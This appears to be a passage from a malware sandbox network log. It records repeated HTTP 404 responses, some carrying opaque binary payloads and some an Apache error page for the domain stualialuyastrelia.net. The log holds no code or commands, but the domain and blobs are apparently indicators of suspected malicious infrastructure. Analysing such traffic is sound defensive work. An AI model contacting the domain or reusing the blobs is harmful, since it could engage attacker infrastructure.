Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 24 Dec 2023 09:44:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 36 36 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 f5 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 22 bc aa 0f 3b 23 bc 66 97 73 47 aa 4b e0 9b 69 d0 72 29 48 8a de 76 60 43 c6 b2 eb 6a 10 9d a9 72 1d 5e df 4f 38 f9 de 17 09 6b a6 ea 12 ff 64 b5 05 16 e5 23 41 93 b2 89 f2 4e 47 6a 99 75 d9 b2 29 69 3c 71 d1 e3 cf c7 e4 6b c1 41 72 b7 4a bf 6c 13 d9 aa 05 f6 d0 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 73 fb 42 15 9b 06 55 53 13 2b 3d fa 1d 09 52 2b e5 8d 83 7b 9e 45 f4 fe 73 8c 5c db c4 21 1d 13 bf c0 e0 92 24 08 4f c5 73 be cb a1 61 6e de f5 69 f9 17 17 7e 5f ef 9a a5 54 c9 a0 c1 bb dd 7a 08 90 4e 19 e0 2c 95 a9 1d 1a f5 96 be 25 51 61 9a 64 28 7c 88 2c c8 48 62 cd d0 4a 98 03 fd 6c 9e aa 6b ac 87 3f bd 61 0d c0 4d bf 46 24 fd f8 12 6c 33 6c 39 7c 0a 8d c7 fd e4 0e a4 eb 7e 71 c7 ed fb 1a 38 9b 4a d8 19 ae c3 4f cb 5e 83 ae 9c 97 02 4c 75 56 ad f3 57 3b 2a b9 72 ee cc 23 b2 75 0e 31 79 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 1b ac c2 46 c1 48 15 ac 4f 8f d7 55 7d af ba 68 92 0e ff 9d 7f 7f 55 40 57 24 75 39 42 e5 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b af 1f ba f6 f6 01 e8 e4 19 74 af 90 4e b1 54 55 a5 a2 b9 1b 6f c7 cb 29 32 28 e7 5b 1e 54 ab 1e 26 7d 11 ee e3 ce 57 c3 62 6f e1 7e a0 3d 68 91 7e 10 06 f1 2c 1e a0 03 5b df 1f e4 a6 4d 1e 9f 10 b9 d9 b0 99 07 99 8a cd e4 7f 74 39 50 6d 03 e2 dd ea ff 80 62 7a d7 60 df c3 e0 2b 29 ba bb 01 5e 17 28 d2 c4 48 1f d0 a1 aa 7a 8f f6 6b e3 cd d0 d9 37 40 80 e3 dc e7 54 99 21 48 c4 3a 96 ec ca e7 17 3f 3c eb 7e 4d a4 70 d4 03 65 a2 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 75 98 c3 67 23 c5 a5 ad 3a 29 43 43 dd 57 03 62 18 ca 13 f8 40 ae ae 88 c1 54 af 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 cb 23 1e 6c 36 ca 04 c1 6d 93 81 19 e3 2f be 8c f5 18 98 52 b9 e9 eb 9e 13 7c b6 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 5a 9e 8b 58 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 24 Dec 2023 09:44:26 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 74 75 61 6c 69 61 6c 75 79 61 73 74 72 65 6c 69 61 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at stualialuyastrelia.net Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 24 Dec 2023 09:44:26 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 36 36 0d 0a 02 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 fd 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 59 8d 64 18 40 12 72 71 ec 42 89 bd 30 d1 55 7e bc 69 f0 5f cc ef b8 77 26 a5 e8 fc 2c 21 53 be 17 7e 13 c8 bb 09 37 c9 42 86 4c b1 97 23 31 73 c7 4c 4d f2 df 70 5d a5 e5 e9 9b 50 11 a8 bb ce 43 35 30 ce 0b e0 2d d8 64 91 54 5b fd 55 19 d0 ed 05 70 b1 17 22 58 4a 33 4f 62 3e 15 21 0b 5a f3 43 93 3a 1a 3e cc 00 2f d1 ff 41 d7 07 53 53 fa cb 1f 9e fd 09 50 0a ee 8c 86 6b 7e 75 f7 ff 78 5b 79 db c4 4b 07 13 ef 04 e1 92 24 18 4f c5 03 e1 cb a1 61 7e de e5 69 a9 19 17 7e 4f af 9a a0 44 c9 a0 c1 b9 dd 7a 08 90 4e 19 e0 2c 95 a9 18 7a d7 96 be 35 51 61 9a d4 3e 7c 8a 28 c9 08 6b a1 d0 4a 9a 13 fd ec 9e aa 6b ac 87 3f bd 61 0d c0 5d bf 56 34 fd f8 3a 6c 33 6c 2a 7c 0a 8d 6b 15 e1 0e 78 eb 7e 71 eb 30 d4 1a f8 98 4a d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 fb 0b b9 1e 68 cc 23 72 e1 0c 31 65 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 92 4e ff 9d bb 7f 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 51 5e 6b 67 e6 1f 25 4b 81 43 df 8e 82 11 e8 e4 1f 6e a1 90 4e b1 54 55 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 3e 54 ab 7e 08 0f 75 8f b7 af 57 a3 5f b3 80 1f d4 1c 68 91 9c 99 03 f1 2c 1e ae 03 5b e5 1f e4 a6 7d 10 9f 10 b9 d9 b0 d9 07 99 ca e3 80 1e 00 18 50 6d 43 c8 d8 8a 8b e1 92 7f d7 9c e8 c2 e0 2b 59 b1 bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a cf f6 6b 23 b4 a6 88 37 00 80 e3 1c 7e 4a fa 52 48 a4 3d 96 4d bb e8 17 3f 8c e2 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca c2 cf 25 ee fc ae fd a4 06 ef f7 d3 77 75 c0 d4 5f f9 55 43 9c b5 09 62 18 fa 0b f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 83 e8 c8 ef e5 90 7a 9a e8 23 1e ac 88 bb 77 b3 0e 23 a0 19 13 98 b9 8c f5 b8 b6 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 89 43 d9 ad 29 c0 37 b0 75 fd 8b 18 e5 bb 01 7d 42 c3 a0 96 7f 78 2e 27 9d 6f 1d 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 20 38 30 1d d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 24 Dec 2023 09:44:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 74 75 61 6c 69 61 6c 75 79 61 73 74 72 65 6c 69 61 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at stualialuyastrelia.net Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 24 Dec 2023 09:44:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 36 36 0d 0a 00 00 b4 60 13 d4 0c 1a 40 10 16 30 80 b7 d3 87 84 4f 15 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 65 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 55 9e 7e 29 fc 53 68 0b 8e 22 f5 17 44 ef a3 86 04 12 fc 2a 54 e9 30 16 c7 37 f2 78 06 0d d2 1f fd dd fa e0 65 8c 71 cd 37 33 33 a7 b1 52 45 7c 0f 57 44 8d e8 be 3c 50 35 11 fe 08 32 b9 7f 18 64 3d 28 2c 87 6a dd d6 be db 43 17 5c 53 a6 cd f6 4d 55 64 51 14 5b fd 51 19 d0 57 7c 5a b1 15 22 18 cf 33 4f 72 3e 15 31 0b 5a a3 06 83 3a 56 2f cb 00 23 be 42 15 c7 07 53 53 fa cb 1f 9e 1d 09 52 2b 31 dd 98 7b 1a 45 f7 ff 78 ed 68 db 46 52 10 13 bf 1e e1 92 24 08 4f c5 03 b5 e1 a1 d1 3d de f5 69 f9 24 17 f6 45 af 9a a5 44 c9 a0 c1 b9 dd 7a 0d 90 4e 19 e0 2c 95 a9 18 1a f5 96 be 25 51 61 9a d4 3e 7c 88 28 c8 48 6b a1 c0 4a 9a 03 fd ec 9e aa 7b ac 87 2f bd 61 0d f0 4b bf 72 34 fd f8 12 6c 33 6c 29 7c 0a 8d c7 fd e4 0e a4 eb 7e 71 eb 80 f5 1a 68 9b 4a d8 37 da a9 37 4f 79 82 ae 02 94 07 4c 75 46 ad f3 57 3b 2a b9 72 ee cc 23 b2 75 0e 31 79 92 90 f7 df f5 ec e7 52 2b 4c e0 fe 60 9d 72 17 70 bb d6 e5 05 3c 27 d4 49 b2 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 92 0e ff 9d 3f 7f 55 00 79 00 1a 4d 07 e7 ac 04 4c dc 43 40 77 fb c2 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e c2 01 e8 24 31 28 cc e0 8b 1f 96 f1 c9 ea b8 1b 6f 03 cd 29 32 28 e7 5b 1e 54 ab 1e 26 7d 11 ee c3 ce 57 a3 4c 1d 85 1f f4 5c 68 f1 b2 5f 6b 81 e9 e0 6c a7 bf e4 1f e4 a6 4d 06 9f 10 bb d9 b0 99 03 99 8a cd e4 7f 74 79 50 6d 43 cc b9 8b 8b a1 62 7a 17 b2 fe ae 90 ee 17 76 1f 01 80 31 28 d2 ee 50 1f d0 5b 8c 7a 8f f0 6b e3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 68 c4 3a f6 63 b9 82 7b 50 bf e5 7e c5 bc 70 d4 03 ab 91 98 76 72 0f ca 82 cf 02 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 1f 29 43 03 b2 27 70 10 7b 3a 1d f8 c2 f5 ad 88 c1 a4 9c 33 25 85 d8 a9 c3 f4 ef 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 4e 93 81 59 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 24 Dec 2023 09:44:29 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 74 75 61 6c 69 61 6c 75 79 61 73 74 72 65 6c 69 61 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at stualialuyastrelia.net Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 24 Dec 2023 09:44:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 36 36 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 9d 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 8b bf 6a c6 ca 05 11 fc f7 c7 be 55 f6 c7 35 f3 73 07 03 d2 ff f9 da fb eb b2 81 71 cd 87 3f 33 d1 60 73 45 7c 1f 57 44 b3 27 b2 3c 50 15 51 fe 08 22 b9 7f 18 66 7d 28 2a a7 6a dd d6 bc db 43 15 5c 53 a6 cd f6 4d 55 60 91 54 5b fd 55 19 d0 ed 25 7d b1 17 20 58 4a 33 4f 62 3e 17 21 0b 5a a3 06 83 3a 56 2f cb 00 23 be 52 15 d7 17 53 53 fa cb 1f 9e 0d 09 52 2b e5 8d 83 7b 7e 45 f7 ff 88 43 59 db 8f 0d 13 13 bf fe ed 92 24 0e 4f c5 03 a1 cb a1 61 7e de f5 69 b9 19 17 7e 5f af 9a a5 44 c4 a0 cd b9 dd 7a 0d 90 4e 19 e0 2c 95 a9 18 1a f5 96 be 25 51 61 9a d4 3e 7c 88 28 c8 48 6b a1 c0 4a 9a 03 fd ec 9e aa 7b ac 87 2f bd 61 0d c0 5d bf 46 34 fd f8 12 4c 33 6c 21 7c 0a 8d c7 fd e4 0e a4 eb 7e 71 e3 a0 f5 1a 20 9b 4a d8 19 ae cc 4f 3b 79 82 ae b2 e3 67 34 01 56 ad f3 13 94 26 b9 72 ce cc 23 b2 c5 02 31 79 90 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 43 11 bb b6 81 43 4f 55 b7 69 b7 9f 33 cf cc 46 d9 a8 19 ac af ed d9 55 3d 1d b6 68 92 0e ff 9d 7f 7f 55 40 57 64 7b 39 26 e7 ac 44 06 f6 27 2c 18 f8 c7 9b 88 e7 3d 66 f1 8a 69 b1 1d 32 12 51 8c c8 1b 4b 81 6b df 8e 82 01 e8 e4 1f 5e a1 90 0e a1 54 17 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 1e 54 ab 1e 06 b2 1d ee c3 ce 57 a3 04 1d 85 1f d6 5c 6d 91 0c a1 0d f1 4c 18 af 03 58 e5 1f e4 86 79 10 99 20 e1 de b0 31 10 9d 8a cd e4 7f 74 79 50 6d 43 cc b9 8b 8b e1 62 7a d7 9c 88 c3 e0 2b a9 b4 bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a 8f f6 6b e3 de e0 d0 37 f4 80 e3 1c c8 20 f5 43 48 c2 25 9f 15 c1 e5 14 1a f1 e3 58 3e d6 71 d4 09 98 dd 99 76 64 72 e7 82 cf 21 2c 99 b6 e9 ed 35 98 9b ad 73 d4 ce d4 5b 2f 63 6c 9d 55 03 3b 8f 13 1f f8 40 bb 8e 04 c4 c4 a1 be 18 7d da a8 e6 38 09 2f cb e6 77 92 8f 23 1a aa 38 93 76 b3 0e ca 16 30 10 88 b9 9d 86 6a 96 52 b3 bf 96 9a 13 ec be 6c 6b e0 f0 73 d4 d4 f0 e9 07 b2 43 b3 69 9f 8b 12 4f ac 00 7d 42 02 a4 80 01 ac 2f 27 97 51 1c c0 a8 9f 21 c6 53 05 b4 65 a2 05 3d 79 60 38 51 21 a2 a7 b8 72 70 ae ea c0 45 d9 5f 32 d6 4b d6 25 3c be 3d 16 16 41 2b c4 16 10 8d ba c6 09 b7 3d db 01 f6 4d 69 60 58 5a 12 b5 39 73 10 8f 69 a0 73 10 2c 01 6e e0 83 68 b3 dc 91 00 31 87 75 0c 71 15 33 b1 ff 84 03 93 c2 07 1e 0b d2 85 b6 66 4f 46 62 93 41 c9 04 85 d4 b7 ea 00 60 10 3e b9 98 a4 e7 fe da ae 32 c8 6f d5 8d 5b ab e4 d1 3d 63 15 95 be af 84 e9 4d f2 92 3c 84 7a 58 5d 1c 7e 9b 37 76 d2 1d 85 ad ac d5 52 da cd 6f dd b2 3b 4a 1f d1 ad 90 e3 9c 25 71 77 22 8e 57 21 cc f8 78 31 66 cf 80 46 1d 42 cd 82 84 0c 84 ad f4 bf cb e
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 24 Dec 2023 09:44:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 74 75 61 6c 69 61 6c 75 79 61 73 74 72 65 6c 69 61 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at stualialuyastrelia.net Port 80</address></body></html>0
